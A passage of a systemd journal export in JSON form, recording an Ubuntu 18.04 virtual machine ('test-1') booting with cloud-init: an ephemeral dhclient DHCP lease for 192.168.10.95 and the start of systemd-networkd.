{ "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=225;b=e2b08827b5804427b422c10c84f1567e;m=7abd1b;t=5bd16dd3e3c82;x=2b59fb9d444212bb", "__REALTIME_TIMESTAMP" : "1615280782326914", "__MONOTONIC_TIMESTAMP" : "8043803", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Initial cloud-init job (pre-networking)...", "UNIT" : "cloud-init-local.service", "INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "_SOURCE_REALTIME_TIMESTAMP" : "1615280782326905" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=226;b=e2b08827b5804427b422c10c84f1567e;m=9dfc2c;t=5bd16dd617b93;x=b24e6efe5fdec21", "__REALTIME_TIMESTAMP" : "1615280784636819", "__MONOTONIC_TIMESTAMP" : "10353708", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "MESSAGE" : "Internet Systems Consortium DHCP Client 4.3.5", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784636742" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=227;b=e2b08827b5804427b422c10c84f1567e;m=9e04cd;t=5bd16dd618434;x=bc3c60b7fa04cd28", "__REALTIME_TIMESTAMP" : "1615280784639028", "__MONOTONIC_TIMESTAMP" : "10355917", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "Copyright 2004-2016 Internet Systems Consortium.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784639018" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=228;b=e2b08827b5804427b422c10c84f1567e;m=9e05da;t=5bd16dd618541;x=b84a43eb2fa58f2e", "__REALTIME_TIMESTAMP" : "1615280784639297", "__MONOTONIC_TIMESTAMP" : "10356186", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "All rights reserved.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784639288" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=229;b=e2b08827b5804427b422c10c84f1567e;m=9e0677;t=5bd16dd6185de;x=d698504e74ccb48", "__REALTIME_TIMESTAMP" : "1615280784639454", "__MONOTONIC_TIMESTAMP" : "10356343", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "For info, please visit https://www.isc.org/software/dhcp/", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784639446" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22a;b=e2b08827b5804427b422c10c84f1567e;m=9e0717;t=5bd16dd61867e;x=48ec75f5f0dd229d", "__REALTIME_TIMESTAMP" : "1615280784639614", "__MONOTONIC_TIMESTAMP" : "10356503", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784639606" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22b;b=e2b08827b5804427b422c10c84f1567e;m=9e1553;t=5bd16dd6194bb;x=bfb22e643e029b0f", "__REALTIME_TIMESTAMP" : "1615280784643259", "__MONOTONIC_TIMESTAMP" : "10360147", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "Listening on LPF/ens3/fa:16:3e:55:6a:e2", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784643251" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22c;b=e2b08827b5804427b422c10c84f1567e;m=9e15bd;t=5bd16dd619525;x=92236d6c9cf78cdf", "__REALTIME_TIMESTAMP" : "1615280784643365", "__MONOTONIC_TIMESTAMP" : "10360253", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "Sending on LPF/ens3/fa:16:3e:55:6a:e2", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784643360" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22d;b=e2b08827b5804427b422c10c84f1567e;m=9e1674;t=5bd16dd6195dc;x=b2891843f03c37b", "__REALTIME_TIMESTAMP" : "1615280784643548", "__MONOTONIC_TIMESTAMP" : "10360436", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "Sending on Socket/fallback", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784643541" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22e;b=e2b08827b5804427b422c10c84f1567e;m=9e1705;t=5bd16dd61966c;x=9f3edbe02215b3ff", "__REALTIME_TIMESTAMP" : "1615280784643692", "__MONOTONIC_TIMESTAMP" : "10360581", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "DHCPDISCOVER on ens3 to 255.255.255.255 port 67 interval 3 (xid=0xf379735)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784643686" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22f;b=e2b08827b5804427b422c10c84f1567e;m=9e1dfa;t=5bd16dd619d62;x=29ed3871bd0e37c0", "__REALTIME_TIMESTAMP" : "1615280784645474", "__MONOTONIC_TIMESTAMP" : "10362362", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "DHCPREQUEST of 192.168.10.95 on ens3 to 255.255.255.255 port 67 (xid=0x3597370f)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784645465" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=230;b=e2b08827b5804427b422c10c84f1567e;m=9e1e64;t=5bd16dd619dcc;x=7a44fe3a0b1c8273", "__REALTIME_TIMESTAMP" : "1615280784645580", "__MONOTONIC_TIMESTAMP" : "10362468", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "DHCPOFFER of 192.168.10.95 from 192.168.10.2", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784645574" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=231;b=e2b08827b5804427b422c10c84f1567e;m=9e25d3;t=5bd16dd61a53a;x=ae1b737a9207c09f", "__REALTIME_TIMESTAMP" : "1615280784647482", "__MONOTONIC_TIMESTAMP" : "10364371", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "DHCPACK of 192.168.10.95 from 192.168.10.2", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784647459" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=232;b=e2b08827b5804427b422c10c84f1567e;m=9e9f06;t=5bd16dd621e6d;x=ceca2907bc6d18d2", "__REALTIME_TIMESTAMP" : "1615280784678509", "__MONOTONIC_TIMESTAMP" : "10395398", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "bound to 192.168.10.95 -- renewal in 33503 seconds.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784678463" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=233;b=e2b08827b5804427b422c10c84f1567e;m=2607d80;t=5bd16df23fce2;x=368d0957136c150f", "__REALTIME_TIMESTAMP" : "1615280814161122", "__MONOTONIC_TIMESTAMP" : "39878016", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "_STREAM_ID" : "3a93b23a9c1d4fdab05d8cac63ea7d61", "SYSLOG_IDENTIFIER" : "cloud-init", "MESSAGE" : "Cloud-init v. 19.1-1-gbaa47854-0ubuntu1~18.04.1 running 'init-local' at Tue, 09 Mar 2021 09:06:24 +0000. Up 10.17 seconds.", "_PID" : "538", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init --local", "_HOSTNAME" : "test-1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=234;b=e2b08827b5804427b422c10c84f1567e;m=261ff9d;t=5bd16df257f04;x=ecf128b801d4eacc", "__REALTIME_TIMESTAMP" : "1615280814259972", "__MONOTONIC_TIMESTAMP" : "39976861", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "cloud-init-local.service", "INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Initial cloud-init job (pre-networking).", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814256658" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=235;b=e2b08827b5804427b422c10c84f1567e;m=2620480;t=5bd16df2583e7;x=6dd0ca85e60b6cf7", "__REALTIME_TIMESTAMP" : "1615280814261223", "__MONOTONIC_TIMESTAMP" : "39978112", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Network (Pre).", "UNIT" : "network-pre.target", "INVOCATION_ID" : "b8f3685ee1a74adbac358b94e5d6fe6e", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814261197" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=236;b=e2b08827b5804427b422c10c84f1567e;m=2621764;t=5bd16df2596cb;x=f92c1cdfdc0c1137", "__REALTIME_TIMESTAMP" : "1615280814266059", "__MONOTONIC_TIMESTAMP" : "39982948", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Network Service...", "UNIT" : "systemd-networkd.service", "INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814266037" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=237;b=e2b08827b5804427b422c10c84f1567e;m=263a172;t=5bd16df2720d8;x=c41f1c6c3213eaa3", "__REALTIME_TIMESTAMP" : "1615280814366936", "__MONOTONIC_TIMESTAMP" : "40083826", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/network/networkd.c", "CODE_LINE" : "152", "CODE_FUNC" : "main", "SYSLOG_IDENTIFIER" : "systemd-networkd", "MESSAGE" : "Enumeration completed", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814366926" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=238;b=e2b08827b5804427b422c10c84f1567e;m=263b01f;t=5bd16df272f86;x=d6a27a130ebbab0d", "__REALTIME_TIMESTAMP" : "1615280814370694", "__MONOTONIC_TIMESTAMP" : "40087583", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : 